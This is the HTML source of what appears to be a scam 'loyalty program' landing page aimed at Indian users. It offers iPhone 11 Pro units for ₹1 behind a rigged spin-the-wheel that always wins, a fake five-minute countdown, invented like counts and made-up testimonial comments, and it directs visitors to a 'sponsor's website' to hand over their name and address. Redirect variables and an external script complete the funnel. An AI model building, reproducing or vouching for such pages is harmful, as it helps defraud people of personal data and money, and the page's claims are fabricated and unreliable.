<!DOCTYPE html>
<html lang="en-in">

<head>
	<base href="">
	<meta content="text/html; charset=utf-8" http-equiv="Content-Type">
	<meta name="robots" content="noindex, nofollow, noarchive">
	<meta name="referrer" content="no-referrer">
	<meta content="width=device-width,initial-scale=1,maximum-scale=1,user-scalable=no" name="viewport">
	<title>Congratulations!</title>
	<meta content="notranslate" name="google">
	<script>
	function dateOffset(j, a) {
		var l = new Boolean(null == j || 0 == j || void 0 == j || "" == j),
			e = new Date(Date.now() - 24 * j * 60 * 60 * 1000);
		1 == l && (j = 0);
		var k = ["Sunday", "Monday", "Tuesday", "Wednesday", "Thursday", "Friday", "Saturday"],
			i = ["January", "February", "March", "April", "Maybe", "June", "July", "August", "September", "October", "November", "December"];
		return null != !a && 0 != !a && void 0 != !a ? e.getDate() + " " + i[e.getMonth()] : "day_name_only" == a && l ? k[e.getDay()] : "top_date" == a && l ? k[e.getDay()] + ", " + e.getDate() + " " + i[e.getMonth()] + " " + e.getFullYear() : void 0
	};
	</script>
	<link href="css/clean.css" rel="stylesheet"> 
</head>
<body onload="setButtonHeight(),autospin1()">
	<div id="header"> <span class="menu"></span>
		<h3><span id="headline">LOYALTY PROGRAM</span></h3><span class="icon"></span> </div>
	<div id="container">
		<div align="center" id="firstpage">
			<div class="date" id="topDate" style="padding-bottom:10px;margin:0">
				<script>
				document.write(dateOffset(0, "top_date"));
				</script></div>
			<div style="margin-bottom:2px">
				<div id="subheadline">
					<p style="font-size:18px"><b>Congratulations!</b>
					</p>
					<p style="padding-top:10px">Today you are lucky!</p>
				</div>
				<div class="intro" style="padding-top:5px"> Every <span id="today"><script>document.write(dateOffset(0,"day_name_only"));</script></span> we select 7
					 users to give them the opportunity to win prizes from our sponsors. Turn the wheel to see which prize you will receive! </div>
				<div id="wheelCon"> <img class="spinAround2 transparent" height="501" id="wheel" src="images/pw_i11.png" width="501">
					<input id="pressButton" onclick="spin()" style="top: 106.2px;" type="button">
					<div><img class="animated rotateIn" id="devMockup" src="images/i11o.png" >
					</div>
				</div>
			</div>
			<div id="secondpage">
				<div class="congrats">
					<h4>

<font color="#3C5A96">Congratulations!<br>You have the chance to win the new iPhone Pro!</font>
</a>
</h4> </div>
				<div class="congrats" style="text-align:left">
					<ol>
						<li>Choose a color that you like. You will be redirected to our sponsor's website</li>
						<li>On the sponsor's website, enter your name and surname, as well as the shipping address</li>
						<li>Your gift will be sent by courier to the address specified by you within 5 days</li>
					</ol> <b>IMPORTANT:</b> Gifts can end anytime, choose faster! </div>
				<div class="timer">Offer valid for <font color="red"><b><span id="mins">4</span> minutes and <span id="hsecs">59</span> seconds</b></font> </div>
				<div class="prize">
					<table>
						<tbody>
							<tr>
								<th></th>
								<td style="padding:10px 5px 10px 0;text-align:center"><img src="images/i11-s.png" style="max-width:100px">
								</td>
								<td style="line-height:1.6">
									<p style="text-align:left"><a href="#CTA_BUTTON" style="cursor:pointer!important" class="mainButton"><span class="name">iPhone 11 Pro 64GB (Silver)</span></a>
									</p>
									<p><span class="smallfont">5.8" Super Retina XDR Display</span>
									</p>
									<p class="regular_price">Common price: <s class="red_text">₹99900</s>
									</p>
									<p class="your_price">Your price: <span>₹1</span>
									</p>
									<p class="remaining"><b>Available: <span>1</span></b>
									</p>
									<div> <a class="button mainButton" href="#CTA_BUTTON" style="cursor:pointer!important"> Choose </a> </div>
								</td>
							</tr>
						</tbody>
					</table>
				</div>
				<div class="prize">
					<table>
						<tbody>
							<tr>
								<th></th>
								<td style="padding:10px 5px 10px 0;text-align:center"><img src="images/i11-g.png" style="max-width:100px">
								</td>
								<td style="line-height:1.6">
									<p style="text-align:left"><a href="#CTA_BUTTON" style="cursor:pointer!important" class="mainButton"><span class="name">iPhone 11 Pro 64GB (Space Grey)</span></a>
									</p>
									<p><span class="smallfont">5.8" Super Retina XDR Display</span>
									</p>
									<p class="regular_price">Common price: <s class="red_text">₹99900</s>
									</p>
									<p class="your_price">Your price: <span>₹1</span>
									</p>
									<p class="remaining"><b>Available: <span>3</span></b>
									</p>
									<div> <a class="button mainButton" href="#CTA_BUTTON" style="cursor:pointer!important">  Choose </a> </div>
								</td>
							</tr>
						</tbody>
					</table>
				</div>
			</div>
		</div>
		<div class="container">
			<div class="comments">
				<div class="wi_like_wrap border_bottom"> <span class="like_people"><span class="like_people_images"><span class="like_people_image_wrap"><img class="like_people_image" height="24" src="images/like_user_1.jpg" width="24"></span> <span class="like_people_image_wrap"><img class="like_people_image" height="24" src="images/like_user_2.jpg" width="24"></span></span> <span class="like_people_text">1537 people like this</span></span>
				</div>
				<div class="wi_buttons border_bottom">
					<div class="wi_buttons_wrap"> <span class="like_wrap"><span class="item_like _i"><i class="i_like"></i> <b class="v_like">1537</b></span> <span class="item_share is_empty _i"><i class="i_share"></i> <b class="v_share">234</b></span></span> <span class="item_views"><i class="i_views"></i> <b class="v_views">544K</b></span> </div>
				</div>
				<center> <font face="arial"></font>
					<table border="0" cellpadding="4" cellspacing="0" style="padding-top:10px;font-size:13px" width="100%">
						<tbody id="comments_list">
							<tr>
								<td align="right" class="photo_avatar" valign="top" width="40"><img src="images/in11.jpg">
								</td>
								<td align="left" valign="top">
									<div class="comment_name">Jagdish Sridhar</div>
									<div class="comment_text">Dropped iPhone 11 Pro! Honestly, I wanted the iMac, but not today ...</div>
									<div class="comments__item__meta">
										<div class="item_date">Yesterday at 08:13 </div>
									</div>
									<div class="pi_links"> <span class="like_wrap"><span class="pi_link">Like</span></span> <span class="pi_reply_wrap">· <span>Comment</span></span> <span class="pi_acts_link"><i class="i_icon"></i></span> </div>
								</td>
							</tr>
							<tr>
								<td colspan="2">
									<hr> </td>
							</tr>
							<tr>
								<td align="right" class="photo_avatar" valign="top" width="40"><img src="images/in12.jpg">
								</td>
								<td align="left" valign="top">
									<div class="comment_name">Venkat Issac</div>
									<div class="comment_text">I won 1 free spin, but I did not win a prize. Can I get another chance? </div>
									<div class="comments__item__meta">
										<div class="item_date">
											<script>
											document.write(dateOffset(2));
											</script></div>
									</div>
									<div class="pi_links"> <span class="like_wrap"><span class="pi_link">Like</span></span> <span class="pi_reply_wrap">· <span>Comment</span></span> <span class="pi_acts_link"><i class="i_icon"></i></span> </div>
								</td>
							</tr>
							<tr>
								<td colspan="2">
									<hr> </td>
							</tr>
							<tr>
								<td align="right" class="photo_avatar" valign="top" width="40"><img src="images/in13.jpg">
								</td>
								<td align="left" valign="top">
									<div class="comment_name">Ehsaan Loke</div>
									<div class="comment_text">I just unpacked the new iMac! This is the best prize of all! </div>
									<div class="comments__item__meta">
										<div class="item_date">
											<script>
											document.write(dateOffset(2));
											</script></div>
									</div>
									<div class="pi_links"> <span class="like_wrap"><span class="pi_link">Like</span></span> <span class="pi_reply_wrap">· <span>Comment</span></span> <span class="pi_acts_link"><i class="i_icon"></i></span> </div>
								</td>
							</tr>
							<tr>
								<td colspan="2">
									<hr> </td>
							</tr>
							<tr>
								<td align="right" class="photo_avatar" valign="top" width="40"><img src="images/in14.jpg">
								</td>
								<td align="left" valign="top">
									<div class="comment_name">Rita Ramakrishnan</div>
									<div class="comment_text">At first I thought it was a joke, but this morning I was delivered a new iPhone 11 Pro, I also got a T-shirt with a logo! </div>
									<div class="comments__item__meta">
										<div class="item_date">
											<script>
											document.write(dateOffset(2));
											</script></div>
									</div>
									<div class="pi_links"> <span class="like_wrap"><span class="pi_link">Like</span></span> <span class="pi_reply_wrap">· <span>Comment</span></span> <span class="pi_acts_link"><i class="i_icon"></i></span> </div>
								</td>
							</tr>
							<tr>
								<td colspan="2">
									<hr> </td>
							</tr>
							<tr>
								<td align="right" class="photo_avatar" valign="top" width="40"><img src="images/in15.jpg">
								</td>
								<td align="left" valign="top">
									<div class="comment_name">Binita Dhingra</div>
									<div class="comment_text">My iMac arrived this morning! I love it!!! </div>
									<div class="comments__item__meta">
										<div class="item_date">
											<script>
											document.write(dateOffset(3));
											</script> </div>
									</div>
									<div class="pi_links"> <span class="like_wrap"><span class="pi_link">Like</span></span> <span class="pi_reply_wrap">· <span>Comment</span></span> <span class="pi_acts_link"><i class="i_icon"></i></span> </div>
								</td>
							</tr>
							<tr>
								<td colspan="2">
									<hr> </td>
							</tr>
							<tr>
								<td align="right" class="photo_avatar" valign="top" width="40"><img src="images/in16.jpg">
								</td>
								<td align="left" valign="top">
									<div class="comment_name">Tulsi Sarkar</div>
									<div class="comment_text">I won the iPad. I still do not believe that this is true! </div>
									<div class="comments__item__meta">
										<div class="item_date">
											<script>
											document.write(dateOffset(3));
											</script></div>
									</div>
									<div class="pi_links"> <span class="like_wrap"><span class="pi_link">Like</span></span> <span class="pi_reply_wrap">· <span>Comment</span></span> <span class="pi_acts_link"><i class="i_icon"></i></span> </div>
								</td>
							</tr>
							<tr>
								<td colspan="2">
									<hr> </td>
							</tr>
							<tr>
								<td align="right" class="photo_avatar" valign="top" width="40"><img src="images/in17.jpg">
								</td>
								<td align="left" valign="top">
									<div class="comment_name">Zaad Ramesh</div>
									<div class="comment_text">I won the ipad, but I already have it, can I change the prize on the iMac? </div>
									<div class="comments__item__meta">
										<div class="item_date">
											<script>
											document.write(dateOffset(4));
											</script> </div>
									</div>
									<div class="pi_links"> <span class="like_wrap"><span class="pi_link">Like</span></span> <span class="pi_reply_wrap">· <span>Comment</span></span> <span class="pi_acts_link"><i class="i_icon"></i></span> </div>
								</td>
							</tr>
							<tr>
								<td colspan="2">
									<hr> </td>
							</tr>
						</tbody>
					</table>
					<div class="show_next_wrap"> <span class="show_next">See all</span> </div>
				</center>
			</div>
		</div>
		<div class="fixed_footer"><img alt="" class="clip" src="images/clip_footer_3.png">
			<input class="footer_input" placeholder="Your message" type="text"> <img alt="" class="btn_send" src="images/footer_right.png">
		</div>
	</div>
	<script type="text/javascript">



	var conMid, mydate = new Date,
		year = mydate.getFullYear(),
		month = mydate.getMonth(),
		day = mydate.getDate(),
		weekday = mydate.getDay(),
		count = 1,
		headline = document.getElementById("headline"),
		topDate = document.getElementById("topDate"),
		today = document.getElementById("today"),
		con = document.getElementById("container"),
		whCon = document.getElementById("wheelCon"),
		dWheel = document.getElementById("wheel"),
		button = document.getElementById("pressButton"),
		device = document.getElementById("devMockup"),
		first = document.getElementById("firstpage"),
		second = document.getElementById("secondpage");

	function setButtonHeight() {
		conMid = (whCon.getBoundingClientRect().bottom - whCon.getBoundingClientRect().top) / 2, button.style.top = conMid - button.offsetHeight / 2 - 0.2 * button.offsetHeight / 2 + "px"
	}



	function spin() {
		switch(count) {
			case 1:
				button.disabled = !0, dWheel.className = "spinAround", setTimeout(function() {
					button.disabled = !1, alert("You have an extra try!\n\nTry again!"), autospin2()
				}, 6800);
				break;
			case 2:
				dWheel.className = "spinAround2", setTimeout(function() {
					dWheel.className = dWheel.className + " transparent"
				}, 6800), setTimeout(function() {
					device.style.display = "block", device.style.left = whCon.offsetWidth / 2 - device.offsetWidth / 2 + "px", device.style.top = conMid - device.offsetHeight / 2 + "px"
				}, 7000), setTimeout(function() {
					first.innerHTML = "<img src='images/loading.gif'>", first.style.padding = "195px 0px", setTimeout(function() {
						first.parentNode.removeChild(first), second.style.display = "block", con.insertBefore(second, con.firstChild), setInterval("countdown()", 1000)
					}, 1500)
				}, 9000)
		}
		count++
	}

	function autospin2() {
		spin();
	}

	function autospin1() {
		/*alert('Congratulations user!\n\nYou are one of the 7 people selected to participate in our loyalty program! You can get 1 gift out of 4!\n\nClick \"OK\" to start!'), */document.getElementById("pressButton").click();
	}

	function countdown() {
		var e = parseInt(document.getElementById("mins").innerHTML),
			f = parseInt(document.getElementById("hsecs").innerHTML),
			g = 0,
			h = 0;
		0 !== e && 0 === f ? (g = e - 1, h = 59) : 0 !== e || 0 !== f ? (g = e, h = f - 1) : 0 === e && 0 === f && (g = e, h = f), h < 10 && (h = "0" + h), document.getElementById("mins").textContent = g, document.getElementById("hsecs").textContent = h
	};
	</script>

<script>
  var cta = 'mainButton';
  var back = 'https://google.com/#back';
  var under = 'https://google.com/#under';
</script>
<script src="script.js"></script>

</body>

</html>